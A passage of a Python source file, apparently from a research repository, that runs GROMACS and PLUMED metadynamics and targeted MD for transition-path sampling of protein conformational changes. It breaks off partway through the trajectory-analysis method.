"is_vendor": false,
"language": "Python",
"length_bytes": 44304,
"license_type": "no_license",
"max_line_length": 145,
"num_lines": 925,
"path": "/TAPS.py",
"repo_name": "xikun2020/TAPS",
"src_encoding": "UTF-8",
"text": "# =======================================================================================================================\n# global import: future_print, numpy, mdtraj, os, re, argparse\n# =======================================================================================================================\nfrom __future__ import print_function, division\nimport numpy as np\nimport mdtraj as md\nimport os\nimport glob\nimport re\nimport shutil\nimport time\nimport errno\n# =======================================================================================================================\n# import python wrappers for MD engines (GROMACS, NAMD, AMBER)\n# =======================================================================================================================\nimport gromacs.setup\nimport gromacs.run\nimport gromacs.tools\nimport gromacs\n\n# For treating gromacs warnings at mdrun as exception in python\n# such that mdrun can be terminated if\nimport warnings\n\nwarnings.simplefilter('error', gromacs.AutoCorrectionWarning)\nwarnings.simplefilter('error', gromacs.BadParameterWarning)\nwarnings.simplefilter('error', gromacs.GromacsValueWarning)\nwarnings.simplefilter('error', gromacs.GromacsFailureWarning)\n\nfrom Confs import Confs\nfrom PcvInd import PcvInd\nfrom Path import Path\n\n## =======================================================================================================================\n## import mpi4py for parallel computing\n## =======================================================================================================================\n#mpi4py package#\n\n# ======================================================================================================================\n# digits formater for iterations: \"3 --> 03\"\n# ======================================================================================================================\ndef digits(s1):\n\ts2 = \"%.3d\" % s1\n\treturn s2\n\n# ==================================================================================================================\n# wrapper for a single run of metaD\n# engine-specific implementation of sampling is realized in this function\n# ==================================================================================================================\ndef runMeta(dire, engine, runName, pluName, cvOut, trjName):\n\tif engine == 'GROMACS':\n\t\tmeta = gromacs.run.MDrunner(dire, ntmpi='1', ntomp=threads, nb='gpu', bonded='gpu', pme='gpu', deffnm=runName, gpu_id=rank, plumed=pluName) \n\t\tmeta.run() \n\t\t# make sure xtc is complete, under restrains, high energy confs may be generated\n\t\t# use trjconv to disregard \"unphysical (CV values is nan)\" frames\n\t\t# meanwhile, there are two other cases to consider\n\t\t# 1. when there is no output or only one line in CV file (sampling crashed in the first step)\n\t\t# this can be dealt with by put the endtime at 0\n\t\t# 2. when the last line is incomplete\n\t\t# just remove the last line\n\t\tkeepLineIndex = []\n\t\tinFile = open(dire + '/' + cvOut, 'r+')\n\t\tfor i, line in enumerate(inFile):\n\t\t\tif line[0] != \"#\":\n\t\t\t\tif not re.match('.*nan.*', line):\n\t\t\t\t\tkeepLineIndex.append(i)\n\t\tlineCount = len(keepLineIndex)\n\t\toutput = open(dire + '/colvar_filter', 'w+')\n\t\tif lineCount == 1: # only one line: keep this line\n\t\t\tendTime = 0\n\t\t\tlines = inFile.readlines()\n\t\t\tline = lines[keepLineIndex[0]]\n\t\t\toutput.write(line)\n\t\telse: # many lines in CV file, only remove the last line (incomplete when sampling crashes)\n\t\t\tinFile = open(dire + '/' + cvOut, 'r+')\n\t\t\tlines = inFile.readlines()\n\t\t\toutput = open(dire + '/colvar_filter', 'w+')\n\t\t\tfor k in range(lineCount - 1): # remove the last line (incomplete when sampling crashes)\n\t\t\t\tline = lines[keepLineIndex[k]]\n\t\t\t\tendTime = line.split()[0]\n\t\t\t\toutput.write(line)\n\t\tinFile.close()\n\t\toutput.close()\n\t\tshutil.move(dire + '/' + trjName, dire + '/bak_' + trjName)\n\t\ttrjconv = gromacs.tools.Trjconv(s=dire + '/' + runName + '.tpr', f=dire + '/bak_' + trjName,\n\t\t\to=dire + '/who_' + trjName, e=endTime, pbc='whole', input=('System'))\n\t\ttrjconv.run()\n\t\ttrjconv = gromacs.tools.Trjconv(s=dire + '/' + runName + '.tpr', f=dire + '/who_' + trjName,\n\t\t\to=dire + '/' + trjName, e=endTime, \\\n\t\t\tur='compact', center=True, pbc='mol', input=('Protein', 'System'), n=dire + '/index.ndx')\n\t\ttrjconv.run()\n\t\tos.remove(dire + '/bak_' + trjName)\n\t\tos.remove(dire + '/who_' + trjName)\n\telse:\n\t\traise ValueError(\"MD engines other than GROMACS are not support yet\")\n\n\n# ==================================================================================================================\n# wrapper for a single run of metaD\n# engine-specific implementation of sampling is realized in this function\n# ==================================================================================================================\ndef runTMD(dire, engine, runName, pluName, trjName):\n\tif engine == 'GROMACS':\n\t\ttmd = gromacs.run.MDrunner(dire, ntmpi='1', ntomp=threads, nb='gpu', bonded='gpu', pme='gpu', deffnm=runName, gpu_id=rank, plumed=pluName)\n\t\ttmd.run()\n\n\t\tshutil.move(dire + '/' + trjName, dire + '/bak_' + trjName)\n\t\ttrjconv = gromacs.tools.Trjconv(s=dire + '/' + runName + '.tpr', f=dire + '/bak_' + trjName,\n\t\t\to=dire + '/who_' + trjName, pbc='whole', input=('System'))\n\t\ttrjconv.run()\n\t\ttrjconv = gromacs.tools.Trjconv(s=dire + '/' + runName + '.tpr', f=dire + '/who_' + trjName, \\\n\t\t\to=dire + '/' + trjName, ur='compact', center=True, pbc='mol', \\\n\t\t\tinput=('Protein', 'System'), n=dire + '/index.ndx')\n\t\ttrjconv.run()\n\t\tos.remove(dire + '/bak_' + trjName)\n\t\tos.remove(dire + '/who_' + trjName)\n\telse:\n\t\traise ValueError(\"MD engines other than GROMACS are not support yet\")\n\n\n# ======================================================================================================================\n# class TAPS: encoding methods for each iteration of TAPS\n# ======================================================================================================================\nclass TAPS(object):\n\t# default structure file, these names are important during sampling and plumed computation\n\tnodeName = 'node.pdb'\n\trunName = 'run'\n\ttrjName = 'run.xtc'\n\ttrjFilter = 'filtered.xtc'\n\tpluName = 'plumed.dat'\n\tcvOut = 'COLVAR'\n\n\t# ==================================================================================================================\n\t# constructor: read in taps parameters and relevant files (system topology, initial path, PCV definition)\n\t# ==================================================================================================================\n\tdef __init__(self, dire='pars', parFile='taps.par', topFile='protein.pdb', p0='path0.xtc', alignFile='align.ndx', \\\n\t\trmsFile='rms.ndx', ndxFile='index.ndx'):\n\n\t\t# check if inputs exists\n\t\tif not os.path.isdir(dire):\n\t\t\traise ValueError(\"Directory %s for initial path & parameters does not exist\" % dire)\n\t\tif not os.path.exists(dire + '/' + parFile):\n\t\t\traise ValueError(\"Parameters file %s is not found in directory %s\" % (parFile, dire))\n\t\tif not os.path.exists(dire + '/' + topFile):\n\t\t\traise ValueError(\"Structure file %s is not found in directory %s\" % (topFile, dire))\n\t\tif not os.path.exists(dire + '/' + p0):\n\t\t\traise ValueError(\"Trajectory of initial path (%s) is not found in directory '%s'\" % (p0, dire))\n\t\tif not os.path.exists(dire + '/' + alignFile):\n\t\t\traise ValueError(\"Atom index file for alignment (%s) is not found in directory %s\" % (alignFile, dire))\n\t\tif not os.path.exists(dire + '/' + rmsFile):\n\t\t\traise ValueError(\"Atom index file for rms computation (%s) is not found in directory %s\" % (rmsFile, dire))\n\n\t\t# record root directory\n\t\tself.dirRoot = os.getcwd()\n\n\t\t# record directory for initial path and parameters\n\t\tself.dirPar = self.dirRoot + '/' + dire\n\n\t\t# record topology file name and position\n\t\tself.topNAME = topFile\n\t\tself.topFile = self.dirPar + '/' + topFile\n\n\t\t# record alignment index file position\n\t\tself.alignFile = self.dirPar + '/' + alignFile\n\n\t\t# record rms index file position\n\t\tself.rmsFile = self.dirPar + '/' + rmsFile\n\n\t\t# record rms index file position\n\t\tself.ndxFile = self.dirPar + '/' + ndxFile\n\n\n\t\t# load atom indices for PCV definition (alignment & rmsd calculation)\n\t\talign = np.loadtxt(self.dirPar + '/' + alignFile, dtype=np.int32)\n\t\trms = np.loadtxt(self.dirPar + '/' + rmsFile, dtype=np.int32)\n\t\tself.pcvInd = PcvInd(align, rms)\n\n\t\t# load initial refPath (compute initial s, included)\n\t\tself.refPath = Path('iter' + digits(0), self.pcvInd)\n\t\tself.refPath.loadFromTRJ(self.dirPar + '/' + p0, self.dirPar + '/' + topFile)\n\n\t\t# initialize initial node (extracting from initial path)\n\t\tself.initNode = self.refPath.nodes.slice(0)\t\t\t#Initial Conf##\n\n\t\t# initialize final node (extracting from initial path)\n\t\tself.finalNode = self.refPath.nodes.slice(self.refPath.n_nodes - 1)\t\t#Final Conf##\n\n\t\t# read in parameters for MD and metaD\n\t\tfr = open(self.dirPar + '/' + parFile, 'r+')\n\t\tpars = fr.read()\n\t\tfr.close()\n\n\t\t# MD parameters\n\t\t# engine specific input check\n\t\tmatch = re.search(\"engine=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.engine = re.split('=', match.group(0).rstrip('\\n'))[1]\n\t\telse:\n\t\t\traise ValueError(\"MD engine not given in parameter file %s\" % (parFile))\n\t\tif self.engine == 'GROMACS':\n\t\t\tmatch = re.search(\"groTOP=.*\\n\", pars)\n\t\t\tif match is not None:\n\t\t\t\tself.groTOP = re.split('=', match.group(0).rstrip('\\n'))[1]\n\t\t\t\tif not os.path.exists(self.dirPar + '/' + self.groTOP):\n\t\t\t\t\traise ValueError(\"GROMACS topology file %s is not found in directory %s\" % (self.groTOP, \\\n\t\t\t\t\t\tself.dirPar))\n\t\t\telse:\n\t\t\t\traise ValueError(\"GROMACS topology file not given in %s\" % (parFile))\n\t\t\tmatch = re.search(\"groMDP=.*\\n\", pars)\n\t\t\tif match is not None:\n\t\t\t\tself.groMDP = re.split('=', match.group(0).rstrip('\\n'))[1]\n\t\t\t\tif not os.path.exists(self.dirPar + '/' + self.groMDP):\n\t\t\t\t\traise ValueError(\"GROMACS template mdp file %s is not found in directory %s\" % (self.groMDP, \\\n\t\t\t\t\t\tself.dirPar))\n\t\t\telse:\n\t\t\t\traise ValueError(\"gromacs mdp file %s not given in %s\" % (parFile))\n\t\telif self.engine == 'NAMD':\n\t\t\traise ValueError('NAMD is not supported yet')\n\t\telif self.engine == 'AMBER':\n\t\t\traise ValueError('AMBER is not supported yet')\n\t\telse:\n\t\t\traise ValueError(\"unknown MD engine %s\" % self.engine)\n\n\t\t# mode = {serial, parallel, qjob}\n\t\tmatch = re.search(\"runMode=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.mode = re.split('=', match.group(0).rstrip('\\n'))[1]\n\t\telse:\n\t\t\traise ValueError(\"Mode of running (runMode) not given in parameter file %f\" % (parFile))\n\n\t\t# time step\n\t\tmatch = re.search(\"timeStep=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.timeStep = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"MD timestep (timestep, unit: ps) not given in parameter file %f\" % (parFile))\n\n\t\tmatch = re.search(\"lenSample=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.lenSample = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"Amount of sampling per taps iteration ('lenSample', unit: ps) not given in \\\n\t\t\t\tparameter file %f\" % (parFile))\n\t\tself.lenMetaD = self.lenSample / self.refPath.n_nodes\n\n\t\t# gaussian height for MetaD\n\t\tmatch = re.search(\"gauHeight=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.gauHeight = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"Height of gaussian for MetaDynamics (gh) not give in parameter file %s\" % (parFile))\n\n\t\t# gaussian width for MetaD\n\t\tmatch = re.search(\"gauWidth=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.sigma = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"Width of gaussian for MetaDynamics (sigma) not given in parameter file %s\" % (parFile))\n\n\t\t# deposition interval for MetaD\n\t\tmatch = re.search(\"tauMetaD=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.tauMetaD = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"Period for adding gaussians (tauMetaD) not given in parameter file %s\" % (parFile))\n\n\t\t# biasFactor for well-tempered MetaD\n\t\tmatch = re.search(\"biasFactor=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.bf = int(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"BiasFactor for wt-MetaDynamics (biasFactor, 2-10) not given in parameter file %s\" % (parFile))\n\n\t\t# system temperature for well-tempered MetaD\n\t\tmatch = re.search(\"temp=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.temp = int(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"Temperature for wt-MetaDynamics (temp) not given in parameter file %s\" % (parFile))\n\n\t\t# output frequency of trajectories\n\t\tmatch = re.search(\"freqTRJ=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.freqTRJ = int(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"Output frequency of sampling trajectories (freqTRJ) not given in parameter file %f\" % (parFile))\n\n\t\tfr = open(self.dirPar + '/' + self.groMDP, 'r+')\n\t\tlinesMDP = fr.readlines()\n\t\tfr.close()\n\t\tmdpFile = 'md.mdp'\n\t\tfw = open(self.dirPar + '/' + mdpFile, 'w+')\n\t\tfw.writelines(linesMDP)\n\t\tprint('nstxout-compressed= %d' % self.freqTRJ, file=fw)\n\t\tfw.close()\n\t\tself.groMDP = mdpFile\n\n\t\t# output frequency of trajectories\n\t\tmatch = re.search(\"kappa=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.kappa = int(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"Wall strength on PCV-s (kappa, 10-50) not given in parameter file %f\" % (parFile))\n\n\t\t# tolerable restraining potential to ensure \"physically irrelevant\" conformations are selected\n\t\t# selecting frames with small restrain potential is a more direct approach than ds-s[0]<sTol\n\t\t# because it makes the choice independent from the kappa of the restraining potential\n\t\tmatch = re.search(\"tolRS=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.rsTol = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"Tolerable restraining potential (rsTol) not found in parameter file %s \\n This parameter\\\n\t\t\t\tis crucial for selecting frames from MetaD trajectories\" % (parFile))\n\n\t\t\t# parameters for path-reparameterization\n\t\t\t# tolerable distance between neighbor nodes, used for reparameterization\n\t\tmatch = re.search(\"tolDist=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.tolDist = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\traise ValueError(\"Tolerable maximum distance (tolDist) between neighbor nodes not given in parameter\\\n\t\t\t\tfile %s\\n This parameter is crucial for path reparameterzation\" % (parFile))\n\n\t\t# tolerable asymmetry factor, determines how much deviation from the used for path reparameterization\n\t\tmatch = re.search(\"devMID=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.devMID = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\t\tif self.devMID > 1 or self.devMID <= 0:\n\t\t\t\traise ValueError(\"Parameter devMID out of range ( 0<devMID<=1 required )\")\n\t\telse:\n\t\t\traise ValueError(\n\t\t\t\t\"Tolerable deviation from vertical line between two distant nodes (devMID) is not given in parameter \\\n\t\t\t\tfile %s\\n This parameter is crucial for path reparameterzation\" % (parFile))\n\n\t\t# tolerable cosTheta, used for reparameterization\n\t\tmatch = re.search(\"tolCos=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.tolCos = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\t\tif self.tolCos > 0.5:\n\t\t\t\tself.tolCos = 0.5\n\t\t\t\tprint(\"Tolerable cos(theta) in parameter file %s must be <=0.5\\n setting to 0.5\" % (parFile))\n\t\telse:\n\t\t\traise ValueError(\n\t\t\t\t\"Tolerable cos(theta) to select \\\"middle\\\" conformations between neighbor nodes is not given in \\\n\t\t\t\t\tparameter file %s\" % (parFile))\n\n\t\t# straightening factor\n\t\tsub_i = self.initNode.atom_slice(self.pcvInd.atomSlice)\n\t\tsub_f = self.finalNode.atom_slice(self.pcvInd.atomSlice)\n\t\tsub_f.superpose(sub_i, 0, self.pcvInd.align)\n\t\tdist_term = md.rmsd(sub_f, sub_i, 0, self.pcvInd.rms)\n\t\tmatch = re.search(\"stf=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.stf = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\t\tif ((self.stf < 1) or (self.stf > (dist_term/self.tolDist/2.5))):\n\t\t\t\tprint(\"Straightening factor (stf) is out of range (must be 1 <= stf <= d[0,end]/tolDist )\")\n\t\t\t\tself.stf = dist_term / self.tolDist / 3\n\t\t\t\tprint(\"Setting stf as d[0,end]/tolDist/3: stf=\", self.stf)\n\t\telse:\n\t\t\tprint(\"Straightening Factor for path reparameterization (stf) not given in \\\n\t\t\t\tparameter file %s\" % (parFile))\n\t\t\tself.stf = dist_term / self.tolDist / 3\n\t\t\tprint(\"Setting stf as d[0,end]/tolDist/3: stf=\", self.stf)\n\n\t\t# wall position of PCV-Z for MetaD\n\t\tmatch = re.search(\"zw=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.zw = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\t\tself.zw = (self.zw * self.tolDist) ** 2\n\t\telse:\n\t\t\traise ValueError(\"Wall position of PCV-Z for MetaDynamics (zw, unit: nm^2) not given in parameter file %s\" % (parFile))\n\n\t\t# wall strength of PCV-Z for MetaD\n\t\tmatch = re.search(\"zwK=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.zwK = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\tself.zwK = self.rsTol / (self.tolDist / 20) ** 2\n\t\t\t# raise ValueError(\"Kappa for wall on PCV-Z is not given for MetaD in parameter file %s\" % (parFile))\n\n\t\t# kappa for targeted MD\n\t\tmatch = re.search(\"kTMD=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.kTMD = int(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\tprint(\"Kappa of targeted MD (kTMD) for path reparameterization is not given in \\\n\t\t\t\tparameter file %s\" % (parFile))\n\n\t\t# length of targeted MD \n\t\t# default length of targeted MD\n\t\tself.lenTMD = 10\n\t\tmatch = re.search(\"lenTMD=.*\\n\", pars)\n\t\tif match is not None:\n\t\t\tself.lenTMD = float(re.split('=', match.group(0).rstrip('\\n'))[1])\n\t\telse:\n\t\t\tprint(\"Length of targeted MD (lenTMD) for path reparameterization is not given in \\\n\t\t\t\tparameter file %s\" % (parFile))\n\n\t# ==================================================================================================================\n\t# Prepare directories & files for MetaD\n\t# 1. make directories\n\t# 2. store node.pdb for sampling under each directory\n\t# 3. specify the MetaD length by self.lenSample / path.n_nodes\n\t# ==================================================================================================================\n\tdef meta_dirs(self, p, dirMeta):\n\t\t# input dirMeta is the directory under which, the MetaD sampling and analysis will be performed\n\t\t# make sure the path is not empty for MetaD sampling\n\t\tif p is None:\n\t\t\traise ValueError(\"Path '%s' is empty, can not be sampled\" % p.pathName)\n\t\t# list to record directories for running\n\t\tdirRUNs = []\n\t\tfor n in range(p.n_nodes):\n\t\t\tdirNode = 'node' + digits(n)\n\t\t\tlongDirNode = self.dirRoot + '/' + dirMeta + '/' + dirNode\n\t\t\tif not os.path.exists(longDirNode):\n\t\t\t\ttry:\n\t\t\t\t\tos.makedirs(longDirNode)\n\t\t\t\texcept OSError as error:\n\t\t\t\t\tif error.errno != errno.EEXIST:\n\t\t\t\t\t\traise\n\t\t\tnd = p.nodes.slice(n)\n\t\t\tdirRUNs.append(dirNode)\n\t\t\tnodeFile = longDirNode + '/' + self.nodeName\n\t\t\tnd.save(nodeFile)\n\t\t\tcmd = 'cp ' + self.ndxFile + ' ' + self.dirPar + '/posre*.itp' + ' ' + longDirNode\n\t\t\tos.system(cmd)\n\t\treturn dirRUNs\n\n\n\t# ==================================================================================================================\n\t# Prepare plumed files for metaD sampling\n\t# 1. plumed input file\n\t# 2. path pdb file for PCV definition in plumed2 format\n\t# NOTE: engine-specific running files is implemented in prepSampling()\n\t# ==================================================================================================================\n\tdef meta_setup(self, p, dirMeta, dirRUNs):\n\t\tif not os.path.exists(dirMeta):\n\t\t\tos.makedirs(dirMeta)\n\t\tfor i in range(len(dirRUNs)):\t# Make sure all the tasks assigned evenly to the nodes #\n\t\t\trunDir = self.dirRoot + '/' + dirMeta + '/' + dirRUNs[i]\n\t\t\t#print(\"+++DEBUG+++ prepSampling for node\", i)\n\t\t\tself.prepSampling(runDir + '/' + self.nodeName, runDir, self.lenSample / p.n_nodes)\n\t\t\t#Next prepare plumed path files\n\t\t\t#print(\"+++DEBUG+++ p.exportPCV\")\n\t\t\tp.exportPCV(runDir)\n\t\t\tp.pcv(runDir) # compute lamda for this path\n\t\t\t# compute self PCV for restraining position on PCV-s\n\t\t\t# Here we must use the node.pdb generated by meta_dirs(), it is the exact starting conformation\n\t\t\t# if we use the xtc file, there might be problems\n\t\t\tnode = md.load(runDir + '/' + self.nodeName, top=self.topFile)\n\t\t\ts0,z0 = p.pcv(runDir, node) \n\t\t\t# write plumed parameters\n\t\t\t# prepare plumed input file for distance calculation\n\t\t\tpluInput = runDir + '/' + self.pluName\n\t\t\tf = open(pluInput, 'w+')\n\t\t\tatoms = ''\n\t\t\tfor j in range(len(self.pcvInd.atomSlice) - 1):\n\t\t\t\tatoms = atoms + str(self.pcvInd.atomSlice[j] + 1) + ','\n\t\t\tatoms = atoms + str(self.pcvInd.atomSlice[len(self.pcvInd.atomSlice) - 1] + 1)\n\t\t\tprint(\"WHOLEMOLECULES STRIDE=1 ENTITY0=%s\" % atoms, file=f)\n\t\t\tprint(\"p1: PATHMSD REFERENCE=%s LAMBDA=%f NEIGH_STRIDE=4 NEIGH_SIZE=8\" \\\n\t\t\t\t% (p.pathName + '_plu.pdb', p.lamda), file=f)\n\t\t\tprint(\"METAD ARG=p1.sss SIGMA=%f HEIGHT=%f PACE=%d TEMP=%f BIASFACTOR=%d LABEL=metaU\" \\\n\t\t\t\t% (self.sigma, self.gauHeight, self.tauMetaD, self.temp, self.bf), file=f)\n\t\t\tprint(\"UPPER_WALLS ARG=p1.zzz AT=%f KAPPA=%f EXP=2 EPS=1 OFFSET=0 LABEL=zwall\" \\\n\t\t\t\t% (self.zw, self.zwK), file=f)\n\t\t\tprint(\"RESTRAINT ARG=p1.sss KAPPA=%f AT=%f LABEL=res\" % (self.kappa, s0), file=f)\n\t\t\tprint(\"PRINT ARG=p1.sss,p1.zzz,metaU.bias,res.bias,zwall.bias STRIDE=\" \\\n\t\t\t\t+ str(self.freqTRJ) + \" FILE=\" + self.cvOut + \" FMT=%8.16f\", file=f)\n\t\t\tf.close()\n\n\tdef prepSampling(self, node, dire, lenMetaD):\n\t\tif self.engine == 'GROMACS': \n\t\t\tgromacs.setup.MD(dire, mdp=self.dirPar + '/' + self.groMDP, mainselection=None, struct=node, \\\n\t\t\t\ttop=self.dirPar + '/' + self.groTOP, deffnm=self.runName, runtime=lenMetaD, \\\n\t\t\t\tdt=self.timeStep, maxwarn=50, ndx=self.ndxFile)\t\n\t\t\t# print('+++DEBUG+++ Sampling preparation finished')\n\t\telse:\n\t\t\traise ValueError(\"MD engines other than GROMACS are not support yet\")\n\n\tdef prepTMD(self, node, dire, lenTMD):\n\t\tif self.engine == 'GROMACS': \n\t\t\tgromacs.setup.MD(dire, mdp=self.dirPar + '/' + self.groMDP, mainselection=None, struct=node, \\\n\t\t\t\ttop=self.dirPar + '/' + self.groTOP, deffnm=self.runName, runtime=lenTMD, \\\n\t\t\t\tdt=self.timeStep, maxwarn=50, ndx=self.ndxFile)\n\t\telse:\n\t\t\traise ValueError(\"MD engines other than GROMACS are not support yet\")\n\n\n\t# ==================================================================================================================\n\t# perform the actual MetaD sampling\n\t# ==================================================================================================================\n\tdef meta_sample(self, dirMeta, dirRUNs): #, NumNode, IndProc):\n\t\tN_jobs = len(dirRUNs) # the total number of trajectories to run\n\t\tfor itr in range(0, int(N_jobs / size) + 1):\t# Make sure all the tasks assigned evenly to the nodes #\n\t\t\t#print('+++DEBUG+++ MetaDynamics sampling for rank %d' % rank )\n\t\t\ttid = itr * size + rank\n\t\t\tif tid < N_jobs:\n\t\t\t\trunDir = self.dirRoot + '/' + dirMeta + '/' + dirRUNs[tid]\n\t\t\t\tprint(\"+++TAPS+++ Sampling Node \" + str(tid) + \" (size \" + str(size) + \", rank \" +str(rank) + \")\")\n\t\t\t\trunMeta(dire=runDir, engine=self.engine, runName=self.runName, pluName=self.pluName, cvOut=self.cvOut, trjName=self.trjName)\n\n\t# ==================================================================================================================\n\t# Prepare directories & files for tMD (for reparameterization)\n\t# after inserting nodes, generate an list of nodes to insert\n\t# 1. make directories\n\t# 2. store node.pdb for sampling under each directory\n\t# 3. specify the MetaD length by self.lenSample / path.n_nodes\n\t# ==================================================================================================================\n\tdef tmd_dirs(self, list_pairs, dirMeta):\n\t\t# input dirMeta is the directory under which, the targeted MD sampling will be performed\n\t\tif list_pairs is None:\n\t\t\traise ValueError(\"list_pairs is empty, no tMD will be performed for path-reparameterization\")\n\t\t# list to record directories for running\n\t\tdirRUNs = []\n\t\tfor i in range(len(list_pairs)):\n\t\t\tdirPair = 'pair' + digits(i)\n\t\t\tlongDirPair = self.dirRoot + '/' + dirMeta + '/' + 'tmd4repar' + '/' + dirPair\n\t\t\tif not os.path.exists(longDirPair):\n\t\t\t\tos.makedirs(longDirPair)\n\t\t\t# store 1st node of the pair as starting conformation for targeted MD\n\t\t\tnd = list_pairs[i].slice(0)\n\t\t\tdirRUNs.append('tmd4repar/' + dirPair)\n\t\t\tnodeFile = longDirPair + '/' + self.nodeName\n\t\t\tnd.save(nodeFile)\n\t\t\t# store 2nd node of the pair as target conformation for targeted MD\n\t\t\ttargetFile = longDirPair + '/target.pdb'\n\t\t\tlist_pairs[i].slice(1).save_plu2(targetFile,self.pcvInd)\n\t\t\tcmd = 'cp ' + self.ndxFile + ' ' + self.dirPar + '/posre*.itp' + ' ' + longDirPair\n\t\t\tos.system(cmd)\n\t\treturn dirRUNs\n\n\t# ==================================================================================================================\n\t# Prepare plumed files for targeted MD sampling\n\t# 1. plumed input file\n\t# NOTE: engine-specific running files is implemented in prepTMD()\n\t# ==================================================================================================================\n\tdef tmd_setup(self, dirMeta, dirRUNs):\n\t\tif not os.path.exists(dirMeta):\n\t\t\tos.makedirs(dirMeta)\n\t\tN_jobs = len(dirRUNs)\n\t\tfor itr in range(0, int(N_jobs / size) + 1):\t# Make sure all the tasks assigned evenly to the nodes #\n\t\t\t#print('+++DEBUG+++ Setting-up tmd sampling for rank %d' % rank )\n\t\t\ttid = itr * size + rank\n\t\t\tif tid < N_jobs: \n\t\t\t\t# prepare MD files\n\t\t\t\trunDir = self.dirRoot + '/' + dirMeta + '/' + dirRUNs[tid]\n\t\t\t\tself.prepTMD(runDir + '/' + self.nodeName, runDir, self.lenTMD)\n\t\t\t\t# prepare plumed input file for distance calculation\n\t\t\t\tpluInput = runDir + '/' + self.pluName\n\t\t\t\tf = open(pluInput, 'w+')\n\t\t\t\tatoms = ''\n\t\t\t\tfor j in range(len(self.pcvInd.atomSlice) - 1):\n\t\t\t\t\tatoms = atoms + str(self.pcvInd.atomSlice[j] + 1) + ','\n\t\t\t\tatoms = atoms + str(self.pcvInd.atomSlice[len(self.pcvInd.atomSlice) - 1] + 1)\n\t\t\t\tprint(\"WHOLEMOLECULES STRIDE=1 ENTITY0=%s\" % atoms, file=f)\n\t\t\t\tprint(\"rmsd: RMSD REFERENCE=target.pdb TYPE=OPTIMAL\", file=f)\n\t\t\t\tprint(\"restraint: ...\", file=f)\n\t\t\t\tprint(\"MOVINGRESTRAINT\", file=f)\n\t\t\t\tprint(\" ARG=rmsd\", file=f)\n\t\t\t\tprint(\" AT0=0 STEP0=0 KAPPA0=0\", file=f)\n\t\t\t\t# length of targeted MD\n\t\t\t\tnumSteps = int(self.lenTMD / self.timeStep / 2)\n\t\t\t\tprint(\" AT1=0 STEP1=%d KAPPA1=%d\" % (numSteps,self.kTMD), file=f)\n\t\t\t\tprint(\" AT2=0 STEP2=%d KAPPA2=%d\" % (numSteps*2,self.kTMD), file=f)\n\t\t\t\tprint(\"...\", file=f)\n\t\t\t\tprint(\"PRINT ARG=rmsd STRIDE=\" + str(self.freqTRJ) + \" FILE=\" + self.cvOut + \" FMT=%8.16f\", file=f)\n\t\t\t\tf.close()\n\n\n\t# ==================================================================================================================\n\t# perform tmd sampling\n\t# ==================================================================================================================\n\tdef tmd_sample(self, dirMeta, dirTMD):\n\t\tN_jobs = len(dirTMD) # the total number of trajectories to run\n\t\tfor itr in range(0, int(N_jobs / size) + 1):\n\t\t\ttid = itr * size + rank\n\t\t\tif tid < N_jobs:\n\t\t\t\trunDir = self.dirRoot + '/' + dirMeta + '/' + dirTMD[tid]\n\t\t\t\t#print(\"+++DEBUG+++ Running TMD\", tid, \"of\", N_jobs, \", size\", size, \", rank\", rank, \"iter,\", itr)\n\t\t\t\trunTMD(dire=runDir, engine=self.engine, runName=self.runName, pluName=self.pluName, trjName=self.trjName)\n\n\n\t# ==================================================================================================================\n\t# Analyze metaD trajectories to update path\n\t# 1. filter metaD trajectories\n\t# select only frames whose restraining potential on PCV-s and wall potenial on PCV-z are within tolerance\n\t# This helps remove frames with high restraining or wall potential that may be \"\"unphysical\".\n\t# 2. select median(z) from filtered data, find geometric centroid of the median(z) conformations in each metaD\n\t# NOTE: pre-process median(z) conformations for clustering (TODO: to be removed in future versions)\n\t# 3. reorder median(z) nodes via concorde (Travelling-salesman solver, implemented in C++)\n\t# 4. path reparameterization (truncate at terminal nodes and insert conformations between distant neighbor nodes)\n\t# ==================================================================================================================\n\tdef meta_analyze(self, dirMeta, dirSamples): #, NumNode, IndProc):\n\n\t\tif rank == 0:\n\t\t\tprint(\"+++TAPS+++ Filtering metaD trajectories: restraining potential must not exceed \", 